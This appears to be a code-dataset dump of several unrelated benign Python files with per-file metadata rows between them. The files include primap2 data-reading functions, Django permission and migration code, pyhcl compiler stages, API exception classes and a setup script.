"No data column in the CSV specified in coords_cols, so nothing to read."
)
if "time" in coords_cols:
parse_dates = [coords_cols["time"]]
else:
parse_dates = False
if add_coords_cols:
add_coords_col_names = {value[0] for value in add_coords_cols.values()}
else:
add_coords_col_names = set()
usecols = list(coords_cols.values()) + list(add_coords_col_names)
data = pd.read_csv(
filepath_or_buffer,
na_values=NA_VALUES,
parse_dates=parse_dates,
usecols=usecols,
)
# remove all non-numeric values from data column
data[csv_data_column] = data[csv_data_column][
pd.to_numeric(data[csv_data_column], errors="coerce").notnull()
].astype(float)
return data
def spec_to_query_string(filter_spec: Dict[str, Union[list, Any]]) -> str:
"""Convert filter specification to query string.
All column conditions in the filter are combined with &."""
queries = []
for col in filter_spec:
if isinstance(filter_spec[col], list):
itemlist = ", ".join(repr(x) for x in filter_spec[col])
filter_query = f"{col} in [{itemlist}]"
else:
filter_query = f"{col} == {filter_spec[col]!r}"
queries.append(filter_query)
return " & ".join(queries)
def filter_data(
data: pd.DataFrame,
filter_keep: Optional[Dict[str, Dict[str, Any]]] = None,
filter_remove: Optional[Dict[str, Dict[str, Any]]] = None,
):
# Filters for keeping data are combined with "or" so that
# everything matching at least one rule is kept.
if filter_keep:
queries = []
for filter_spec in filter_keep.values():
q = spec_to_query_string(filter_spec)
queries.append(f"({q})")
query = " | ".join(queries)
data.query(query, inplace=True)
# Filters for removing data are negated and combined with "and" so that
# only rows which don't match any rule are kept.
if filter_remove:
queries = []
for filter_spec in filter_remove.values():
q = spec_to_query_string(filter_spec)
queries.append(f"~({q})")
query = " & ".join(queries)
data.query(query, inplace=True)
data.reset_index(drop=True, inplace=True)
def fill_from_other_col(
df: pd.DataFrame,
*,
coords_value_filling: Dict[str, Dict[str, Dict[str, str]]],
attrs: Dict[str, Any],
) -> pd.DataFrame:
"""
This function fills value in one column based on values in other columns.
It can be used to fill NaN values or to replace e.g. non-standard or
non-unique category codes based on category names. It operates on pandas
DataFrames.
Parameters
----------
df : pd.DataFrame
Data to operate on
coords_value_filling : dict
A dict with primap2 dimension names as keys. These are the target columns where
values will be filled (or replaced). Vales are dicts with primap2 dimension
names as keys. These are the source columns. The values are dicts with source
value - target value mappings.
This can be used to e.g. fill missing category codes based on category names or
to replace category codes which do not meet the terminology using the category
names.
attrs : dict
Dataset attributes
Returns
-------
pd.DataFrame
"""
dim_aliases = _alias_selection.translations_from_attrs(attrs, include_entity=True)
# loop over target columns in value mapping
for target_col in coords_value_filling:
target_info = coords_value_filling[target_col]
# loop over source columns
for source_col in target_info:
mapping_info = target_info[source_col]
# loop over cases
target_col_name = dim_aliases.get(target_col, target_col)
source_col_name = dim_aliases.get(source_col, source_col)
for source_value in mapping_info:
df.loc[df[source_col_name] == source_value, target_col_name] = df.loc[
df[source_col_name] == source_value, target_col_name
] = mapping_info[source_value]
return df
def add_dimensions_from_defaults(
data: pd.DataFrame,
coords_defaults: Dict[str, Any],
additional_allowed_coords: Iterable[str] = (),
):
if_columns = (
INTERCHANGE_FORMAT_OPTIONAL_COLUMNS
+ INTERCHANGE_FORMAT_MANDATORY_COLUMNS
+ list(additional_allowed_coords)
)
for coord in coords_defaults.keys():
if coord in if_columns or coord.startswith(SEC_CATS_PREFIX):
# add column to dataframe with default value
data[coord] = coords_defaults[coord]
else:
raise ValueError(
f"{coord!r} given in coords_defaults is unknown - prefix with "
f"{SEC_CATS_PREFIX!r} to add a secondary category."
)
def map_metadata(
data: pd.DataFrame,
*,
meta_mapping: Dict[str, Union[str, Callable, dict]],
attrs: Dict[str, Any],
):
"""Map the metadata according to specifications given in meta_mapping.
First map entity, then the rest."""
if "entity" in meta_mapping.keys():
meta_mapping_entity = dict(entity=meta_mapping["entity"])
meta_mapping.pop("entity")
map_metadata_unordered(data, meta_mapping=meta_mapping_entity, attrs=attrs)
map_metadata_unordered(data, meta_mapping=meta_mapping, attrs=attrs)
def map_metadata_unordered(
data: pd.DataFrame,
*,
meta_mapping: Dict[str, Union[str, Callable, dict]],
attrs: Dict[str, Any],
):
"""Map the metadata according to specifications given in meta_mapping."""
dim_aliases = _alias_selection.translations_from_attrs(attrs, include_entity=True)
# TODO: add additional mapping functions here
# values: (function, additional arguments)
mapping_functions = {
"PRIMAP1": {
"category": (_conversion.convert_ipcc_code_primap_to_primap2, []),
"entity": (_conversion.convert_entity_gwp_primap_to_primap2, []),
"unit": (
_conversion.convert_unit_primap_to_primap2,
[dim_aliases.get("entity", "entity")],
),
}
}
meta_mapping_df = {}
# preprocess meta_mapping
for column, mapping in meta_mapping.items():
column_name = dim_aliases.get(column, column)
if isinstance(mapping, str) or callable(mapping):
if isinstance(mapping, str): # need to translate to function first
try:
func, args = mapping_functions[mapping][column]
except KeyError:
logger.error(
f"Unknown metadata mapping {mapping!r} for column {column!r}, "
f"known mappings are: {list(mapping_functions.keys())}."
)
raise ValueError(
f"Unknown metadata mapping {mapping!r} for column {column!r}."
)
else:
func = mapping
args = []
if not args: # simple case: no additional args needed
values_to_map = data[column_name].unique()
values_mapped = map(func, values_to_map)
meta_mapping_df[column_name] = dict(zip(values_to_map, values_mapped))
else: # need to supply additional arguments
# this can't be handled using the replace()-call later since the mapped
# values don't depend on the original values only, therefore
# we do it directly
sel = [column_name] + args
values_to_map = np.unique(data[sel].to_records(index=False))
for vals_to_map in values_to_map:
# we replace values where all the arguments match - build a
# selector for that, then do the replacement
selector = data[column_name] == vals_to_map[0]
for i, arg in enumerate(args):
selector &= data[arg] == vals_to_map[i + 1]
data.loc[selector, column_name] = func(*vals_to_map)
else:
meta_mapping_df[column_name] = mapping
data.replace(meta_mapping_df, inplace=True)
def rename_columns(
data: pd.DataFrame,
coords_cols: Dict[str, str],
add_coords_cols: Dict[str, List[str]],
coords_defaults: Dict[str, Any],
coords_terminologies: Dict[str, str],
) -> dict:
"""Rename columns to match PRIMAP2 specifications and generate the corresponding
dataset-wide attrs for PRIMAP2."""
attr_names = {"category": "cat", "scenario": "scen", "area": "area"}
attrs = {}
sec_cats = []
coord_renaming = {}
for coord in itertools.chain(coords_cols, coords_defaults):
if coord in coords_terminologies:
name = f"{coord} ({coords_terminologies[coord]})"
if coord == "entity":
attrs["entity_terminology"] = coords_terminologies[coord]
else:
name = coord
if coord.startswith(SEC_CATS_PREFIX):
name = name[len(SEC_CATS_PREFIX) :]
sec_cats.append(name)
elif coord in attr_names:
attrs[attr_names[coord]] = name
coord_renaming[coords_cols.get(coord, coord)] = name
for coord in add_coords_cols:
coord_renaming[add_coords_cols[coord][0]] = coord
data.rename(columns=coord_renaming, inplace=True)
if sec_cats:
attrs["sec_cats"] = sec_cats
return attrs
def harmonize_units(
data: pd.DataFrame,
*,
unit_col: str = None,
attrs: Optional[dict] = None,
dimensions: Iterable[str],
) -> None:
"""
Harmonize the units of the input data. For each entity, convert
all time series to the same unit (the unit that occurs first). Units must already
be in PRIMAP2 style.
Parameters
----------
data: pd.DataFrame
data for which the units should be harmonized
unit_col: str, optional
column name for unit column. Default: "unit"
attrs: dict, optional
attrs defining the aliasing of columns. If attrs contains "entity_terminology",
"entity (<entity_terminology>)" will be used as the entity column, otherwise
simply "entity" will be used as the entity column.
dimensions: list of str
the dimensions, i.e. the metadata columns.
Returns
-------
None
The data is altered in place.
"""
# we need to convert the data such that we have one unit per entity
data_cols = list(set(data.columns.values) - set(dimensions))
if attrs is not None:
dim_aliases = _alias_selection.translations_from_attrs(
attrs, include_entity=True
)
entity_col = dim_aliases.get("entity", "entity")
else:
entity_col = "entity"
if unit_col is None:
unit_col = dim_aliases.get("unit", "unit")
entities = data[entity_col].unique()
for entity in entities:
# get all units for this entity
data_this_entity = data.loc[data[entity_col] == entity]
units_this_entity = data_this_entity[unit_col].unique()
# print(units_this_entity)
if len(units_this_entity) > 1:
# need unit conversion. convert to first unit (base units have second as
# time that is impractical)
unit_to = units_this_entity[0]
# print("unit_to: " + unit_to)
for unit in units_this_entity[1:]:
# print(unit)
unit_pint = ureg[unit]
unit_pint = unit_pint.to(unit_to)
# print(unit_pint)
factor = unit_pint.magnitude
# print(factor)
mask = (data[entity_col] == entity) & (data[unit_col] == unit)
data.loc[mask, data_cols] *= factor
data.loc[mask, unit_col] = unit_to
def sort_columns_and_rows(
data: pd.DataFrame,
dimensions: Iterable[Hashable],
) -> (pd.DataFrame, List[Hashable]):
"""Sort the data.
The columns are ordered according to the order in
INTERCHANGE_FORMAT_COLUMN_ORDER, with secondary categories alphabetically after
the category and all date columns in order at the end.
The rows are ordered by values of the non-date columns.
Parameters
----------
data: pd.DataFrame
data which should be ordered
dimensions: list of str
the dimensions, i.e. the metadata columns.
Returns
-------
sorted, dimensions_sorted : (pd.DataFrame, list of str)
the input data frame with columns and rows ordered and the dimensions sorted.
"""
time_cols = list(set(data.columns.values) - set(dimensions))
other_cols = list(dimensions)
cols_sorted = []
for col in INTERCHANGE_FORMAT_COLUMN_ORDER:
for ocol in other_cols:
if ocol == col or (isinstance(ocol, str) and ocol.startswith(f"{col} (")):
cols_sorted.append(ocol)
other_cols.remove(ocol)
break
cols_sorted += list(sorted(other_cols))
data: pd.DataFrame = data[cols_sorted + list(sorted(time_cols))]
data.sort_values(by=cols_sorted, inplace=True)
data.reset_index(inplace=True, drop=True)
return data, cols_sorted
| 38.329403 | 138 | 0.661354 | 6,943 | 52,013 | 4.783091 | 0.068126 | 0.033124 | 0.021139 | 0.009275 | 0.752085 | 0.711644 | 0.686982 | 0.68099 | 0.667861 | 0.658165 | 0 | 0.005618 | 0.260819 | 52,013 | 1,356 | 139 | 38.35767 | 0.858142 | 0.505662 | 0 | 0.422886 | 0 | 0 | 0.077969 | 0.012714 | 0 | 0 | 0 | 0.005162 | 0 | 1 | 0.036484 | false | 0 | 0.018242 | 0 | 0.079602 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
204f7a689c9cb2fdb02cbe9f771915f1d9f47a4e | 286 | py | Python | students/k3340/laboratory_works/Zakoulov_Ilya/backend/src/quests/permissions.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 10 | 2020-03-20T09:06:12.000Z | 2021-07-27T13:06:02.000Z | students/k3340/laboratory_works/Zakoulov_Ilya/backend/src/quests/permissions.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 134 | 2020-03-23T09:47:48.000Z | 2022-03-12T01:05:19.000Z | students/k3340/laboratory_works/Zakoulov_Ilya/backend/src/quests/permissions.py | TonikX/ITMO_ICT_-WebProgramming_2020 | ba566c1b3ab04585665c69860b713741906935a0 | [
"MIT"
] | 71 | 2020-03-20T12:45:56.000Z | 2021-10-31T19:22:25.000Z | from rest_framework.permissions import BasePermission, SAFE_METHODS, IsAdminUser
class IsAdminOrReadOnly(IsAdminUser):
def has_permission(self, request, view):
if request.method in SAFE_METHODS:
return True
return super().has_permission(request, view)
| 31.777778 | 80 | 0.741259 | 32 | 286 | 6.46875 | 0.71875 | 0.10628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.192308 | 286 | 8 | 81 | 35.75 | 0.896104 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
20568ee0e3d02dd89899fa7044dd4f56e65900a1 | 303 | py | Python | Convolutional-Neural-Networks/Week-1/gram_matrix.py | anoushkrit/MOOCs | 7bb4a031224af87a67d0c94043a8f15d7e718bb5 | [
"MIT"
] | 3 | 2019-10-28T19:03:43.000Z | 2021-12-02T14:39:53.000Z | Convolutional-Neural-Networks/Week-1/gram_matrix.py | anoushkrit/MOOCs | 7bb4a031224af87a67d0c94043a8f15d7e718bb5 | [
"MIT"
] | null | null | null | Convolutional-Neural-Networks/Week-1/gram_matrix.py | anoushkrit/MOOCs | 7bb4a031224af87a67d0c94043a8f15d7e718bb5 | [
"MIT"
] | 1 | 2020-12-22T05:57:27.000Z | 2020-12-22T05:57:27.000Z | # GRADED FUNCTION: gram_matrix
def gram_matrix(A):
"""
Argument:
A -- matrix of shape (n_C, n_H*n_W)
Returns:
GA -- Gram matrix of A, of shape (n_C, n_C)
"""
### START CODE HERE ### (≈1 line)
GA = tf.matmul(A, tf.transpose(A))
### END CODE HERE ###
return GA
| 17.823529 | 47 | 0.547855 | 49 | 303 | 3.265306 | 0.530612 | 0.1875 | 0.1 | 0.1125 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004673 | 0.293729 | 303 | 16 | 48 | 18.9375 | 0.738318 | 0.561056 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
6463caa1511b00b8a92bd2e30addbd1f22879af8 | 1,629 | py | Python | pyhcl/dsl/stage.py | raybdzhou/PyChip-py-hcl | 08edc6ad4d2978eb417482f6f92678f8f9a1e3c7 | [
"MIT"
] | null | null | null | pyhcl/dsl/stage.py | raybdzhou/PyChip-py-hcl | 08edc6ad4d2978eb417482f6f92678f8f9a1e3c7 | [
"MIT"
] | null | null | null | pyhcl/dsl/stage.py | raybdzhou/PyChip-py-hcl | 08edc6ad4d2978eb417482f6f92678f8f9a1e3c7 | [
"MIT"
] | null | null | null | from abc import ABC, abstractclassmethod
from dataclasses import dataclass
from pyhcl.ir import low_ir
from pyhcl.dsl.check_and_infer import CheckAndInfer
from pyhcl.passes.replace_subaccess import ReplaceSubaccess
from pyhcl.passes.replace_subindex import ReplaceSubindex
from pyhcl.passes.expand_aggregate import ExpandAggregate
from pyhcl.passes.expand_whens import ExpandWhens
from pyhcl.passes.expand_memory import ExpandMemory
from pyhcl.passes.optimize import Optimize
from pyhcl.passes.utils import AutoName
class Form(ABC):
@abstractclassmethod
def emit(self) -> str:
...
@dataclass
class HighForm(Form):
c: low_ir.Circuit
def emit(self) -> str:
self.c = CheckAndInfer.run(self.c)
return self.c.serialize()
@dataclass
class MidForm(Form):
def emit(self) -> str:
...
@dataclass
class LowForm(Form):
c: low_ir.Circuit
def emit(self) -> str:
AutoName()
self.c = CheckAndInfer.run(self.c)
self.c = ExpandMemory().run(self.c)
self.c = ReplaceSubaccess().run(self.c)
self.c = ExpandAggregate().run(self.c)
self.c = ExpandWhens().run(self.c)
self.c = ReplaceSubindex().run(self.c)
self.c = Optimize().run(self.c)
return self.c.serialize()
@dataclass
class Verilog(Form):
c: low_ir.Circuit
def emit(self) -> str:
self.c = CheckAndInfer.run(self.c)
self.c = ExpandAggregate().run(self.c)
self.c = ReplaceSubaccess().run(self.c)
self.c = ReplaceSubindex().run(self.c)
self.c = Optimize().run(self.c)
return self.c.verilog_serialize() | 28.578947 | 59 | 0.682627 | 214 | 1,629 | 5.140187 | 0.21028 | 0.131818 | 0.094545 | 0.109091 | 0.494545 | 0.494545 | 0.443636 | 0.443636 | 0.415455 | 0.335455 | 0 | 0 | 0.202578 | 1,629 | 57 | 60 | 28.578947 | 0.846805 | 0 | 0 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.104167 | false | 0.145833 | 0.229167 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
6466039d821ee4154e806e7e1417d4aa6079ddfa | 1,312 | py | Python | qatrack/qa/migrations/0032_auto_20190313_2112.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 20 | 2021-03-11T18:37:32.000Z | 2022-03-23T19:38:07.000Z | qatrack/qa/migrations/0032_auto_20190313_2112.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 75 | 2021-02-12T02:37:33.000Z | 2022-03-29T20:56:16.000Z | qatrack/qa/migrations/0032_auto_20190313_2112.py | crcrewso/qatrackplus | b9da3bc542d9e3eca8b7291bb631d1c7255d528e | [
"MIT"
] | 5 | 2021-04-07T15:46:53.000Z | 2021-09-18T16:55:00.000Z | # Generated by Django 2.1.7 on 2019-03-14 01:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('qa', '0031_convert_null_mc_tols'),
]
operations = [
migrations.AlterField(
model_name='tolerance',
name='mc_pass_choices',
field=models.CharField(blank=True, default='', help_text='Comma seperated list of choices that are considered passing', max_length=2048, verbose_name='Multiple Choice OK Values'),
),
migrations.AlterField(
model_name='tolerance',
name='mc_tol_choices',
field=models.CharField(blank=True, default='', help_text='Comma seperated list of choices that are considered at tolerance', max_length=2048, verbose_name='Multiple Choice Tolerance Values'),
),
migrations.AlterField(
model_name='unittestcollection',
name='content_type',
field=models.ForeignKey(help_text='Choose whether to use a Test List or Test List Cycle', limit_choices_to={'app_label': 'qa', 'model__in': ['testlist', 'testlistcycle']}, on_delete=django.db.models.deletion.PROTECT, to='contenttypes.ContentType', verbose_name='Test List or Test List Cycle'),
),
]
| 43.733333 | 305 | 0.673018 | 158 | 1,312 | 5.424051 | 0.512658 | 0.03734 | 0.087515 | 0.101517 | 0.514586 | 0.466744 | 0.413069 | 0.221704 | 0.221704 | 0.221704 | 0 | 0.026188 | 0.214177 | 1,312 | 29 | 306 | 45.241379 | 0.805044 | 0.034299 | 0 | 0.347826 | 1 | 0 | 0.33913 | 0.038735 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.086957 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
64776eed091b241829ab4063fb50e4b438cbec44 | 93 | py | Python | BackEnd/venv/lib/python3.8/site-packages/pytest_cov/__init__.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
] | 1 | 2020-12-26T21:23:40.000Z | 2020-12-26T21:23:40.000Z | BackEnd/venv/lib/python3.8/site-packages/pytest_cov/__init__.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
] | 2 | 2019-12-26T17:31:57.000Z | 2020-01-06T19:45:26.000Z | BackEnd/venv/lib/python3.8/site-packages/pytest_cov/__init__.py | MatheusBrodt/App_LabCarolVS | 9552149ceaa9bee15ef9a45fab2983c6651031c4 | [
"MIT"
] | 2 | 2019-11-02T08:03:09.000Z | 2020-06-29T14:52:15.000Z | """pytest-cov: avoid already-imported warning: PYTEST_DONT_REWRITE."""
__version__ = "2.7.1"
| 31 | 70 | 0.741935 | 13 | 93 | 4.846154 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035294 | 0.086022 | 93 | 2 | 71 | 46.5 | 0.705882 | 0.688172 | 0 | 0 | 0 | 0 | 0.217391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
647972ef3df92c37ae1a9e56b1fee62d768f30c4 | 172 | py | Python | src/hauberk/__init__.py | akail/hauberk | 1fd990bdb78c78e1e8b1cee76fa8f414590fcee8 | [
"MIT"
] | null | null | null | src/hauberk/__init__.py | akail/hauberk | 1fd990bdb78c78e1e8b1cee76fa8f414590fcee8 | [
"MIT"
] | 56 | 2018-07-31T01:00:54.000Z | 2020-08-06T16:00:02.000Z | src/hauberk/__init__.py | akail/hauberk | 1fd990bdb78c78e1e8b1cee76fa8f414590fcee8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Top-level package for Hauberk Email Automations."""
__author__ = """Andrew Kail"""
__email__ = 'andrew.a.kail@gmail.com'
__version__ = '0.1.0'
| 21.5 | 54 | 0.656977 | 23 | 172 | 4.391304 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026846 | 0.133721 | 172 | 7 | 55 | 24.571429 | 0.651007 | 0.412791 | 0 | 0 | 0 | 0 | 0.410526 | 0.242105 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
647cc7bce9f45f757b716e12d2b594fad871f084 | 2,460 | py | Python | projects/exceptions.py | platiagro/projects | 00da234b35003bb0ecc2d22a997e08737ceda044 | [
"Apache-2.0"
] | 6 | 2019-09-16T13:07:20.000Z | 2021-06-02T19:02:05.000Z | projects/exceptions.py | platiagro/projects | 00da234b35003bb0ecc2d22a997e08737ceda044 | [
"Apache-2.0"
] | 325 | 2019-09-20T20:06:00.000Z | 2022-03-30T15:05:49.000Z | projects/exceptions.py | platiagro/projects | 00da234b35003bb0ecc2d22a997e08737ceda044 | [
"Apache-2.0"
] | 17 | 2019-08-02T16:55:47.000Z | 2021-06-26T19:13:35.000Z | # -*- coding: utf-8 -*-
"""
Useful exception classes that are used to return HTTP errors.
"""
class ApiException(Exception):
"""
The base exception class for all APIExceptions.
Parameters
----------
code : str
Error code.
message : str
Human readable string describing the exception.
status_code : int
HTTP status code.
"""
def __init__(self, code: str, message: str, status_code: int):
self.code = code
self.message = message
self.status_code = status_code
class BadRequest(ApiException):
"""
Bad Request response status code indicates that the server cannot or will not
process the request due to something that is perceived to be a client error.
A common cause is that the client has sent invalid request values.
"""
def __init__(self, code: str, message: str):
super().__init__(code, message, status_code=400)
class Forbidden(ApiException):
"""
Forbidden client error status response code indicates that the server understands
the request but refuses to authorize it.
"""
def __init__(self, code: str, message: str):
super().__init__(code, message, status_code=403)
class NotFound(ApiException):
"""
Not Found client error response code indicates that the server can't find the requested resource.
A common cause is that a provided ID does not exist in the database.
"""
def __init__(self, code: str, message: str):
super().__init__(code, message, status_code=404)
class InternalServerError(ApiException):
"""
Internal Server Error server error response code indicates that the server
encountered an unexpected condition that prevented it from fulfilling the request.
This error response is a generic "catch-all" response.
You should log error responses like the 500 status code with more details about
the request to prevent the error from happening again in the future.
"""
def __init__(self, code: str, message: str):
super().__init__(code, message, status_code=500)
class ServiceUnavailable(ApiException):
"""
Service Unavailable server error response code indicates that the server is
not ready to handle the request.
A common cause is that the database is not available or overloaded.
"""
def __init__(self, code: str, message: str):
super().__init__(code, message, status_code=503)
| 29.285714 | 101 | 0.69065 | 321 | 2,460 | 5.127726 | 0.358255 | 0.072904 | 0.040097 | 0.054678 | 0.344471 | 0.31774 | 0.271567 | 0.230863 | 0.176185 | 0.176185 | 0 | 0.010053 | 0.231707 | 2,460 | 83 | 102 | 29.638554 | 0.860847 | 0.545935 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
647ed5cef9f088b96e328f883e5a96af60b1a881 | 1,058 | py | Python | setup.py | adrianer/pytest-usefixturesif | c5608a24261fb074ab14887e82d9c56d38376317 | [
"BSD-3-Clause"
] | null | null | null | setup.py | adrianer/pytest-usefixturesif | c5608a24261fb074ab14887e82d9c56d38376317 | [
"BSD-3-Clause"
] | 1 | 2019-01-29T14:11:15.000Z | 2019-01-29T14:11:15.000Z | setup.py | adrianer/pytest-usefixturesif | c5608a24261fb074ab14887e82d9c56d38376317 | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
setup(
name='pytest-usefixturesif',
description='pytest plugin that makes it possible to have fixtures used only when a condition applies',
long_description=open("README.md").read(),
version='0.0.2',
url='https://github.com/adrianer/pytest-usefixturesif',
download_url='https://github.com/adrianer/pytest-usefixturesif/archive/0.1.tar.gz',
license='BSD',
author='Adrian Kalla',
author_email='adrian.kalla@gmail.com',
py_modules=['pytest_usefixturesif'],
entry_points={'pytest11': ['usefixturesif = pytest_usefixturesif']},
zip_safe=False,
include_package_data=True,
platforms='any',
install_requires=['pytest>=3.3.2'],
keywords=['testing', 'fixtures', 'condition'],
classifiers=[
"Framework :: Pytest",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
]
)
| 36.482759 | 107 | 0.65879 | 120 | 1,058 | 5.716667 | 0.616667 | 0.138484 | 0.182216 | 0.113703 | 0.12828 | 0.12828 | 0.12828 | 0 | 0 | 0 | 0 | 0.02093 | 0.187146 | 1,058 | 28 | 108 | 37.785714 | 0.776744 | 0 | 0 | 0 | 0 | 0.037037 | 0.546314 | 0.020794 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.037037 | 0 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
64804597fb314c190aa7abcde79f44a874b88f4e | 1,224 | py | Python | src/kernel/testdata/err/__init__.py | metaesque/meta | c3e6413ca6cc6ff5456158b128070b36baf2d36a | [
"AML",
"TCL",
"Ruby"
] | null | null | null | src/kernel/testdata/err/__init__.py | metaesque/meta | c3e6413ca6cc6ff5456158b128070b36baf2d36a | [
"AML",
"TCL",
"Ruby"
] | 1 | 2018-10-30T03:14:34.000Z | 2018-10-30T03:19:35.000Z | src/kernel/testdata/err/__init__.py | metaesque/meta | c3e6413ca6cc6ff5456158b128070b36baf2d36a | [
"AML",
"TCL",
"Ruby"
] | null | null | null | # -*- coding: utf-8 -*-
"""An intentionally broken codebase."""
try:
import demo.err
except ImportError:
pass
if not getattr(demo, 'err', None):
import sys
demo.err = sys.modules[__name__]
import metax.root
import sys
class AMeta(metax.root.ObjectMeta):
"""Auto-generated meta class for demo.err.A."""
def __init__(cls, name, bases, symbols):
"""No comment provided.
Args:
name: &str
bases: &#vec<class>
symbols: &#map
"""
super(AMeta, cls).__init__(name, bases, symbols)
# User-provided code follows.
class A(metax.root.Object):
"""Undocumented."""
__metaclass__ = AMeta
def __init__(self):
super(A, self).__init__()
# User-provided code follows.
def f(self):
self.g()
def g(self):
self.h()
def h(self):
raise Exception()
def meta(self):
result = self.__class__
assert issubclass(result, A)
assert issubclass(result, MetaA)
return result
def printMeta(self, fp=sys.stdout, indent=''):
"""Auto-generated human-readable summary of this object.
Args:
fp: ostream
indent: str
"""
subindent = indent + " "
fp.write('A %x:\n' % id(self))
MetaA = A
# Class initialization methods
| 18.830769 | 60 | 0.629085 | 157 | 1,224 | 4.726115 | 0.496815 | 0.037736 | 0.043127 | 0.061995 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001059 | 0.228758 | 1,224 | 64 | 61 | 19.125 | 0.784958 | 0.29902 | 0 | 0.064516 | 0 | 0 | 0.015171 | 0 | 0 | 0 | 0 | 0 | 0.064516 | 1 | 0.225806 | false | 0.032258 | 0.16129 | 0 | 0.516129 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
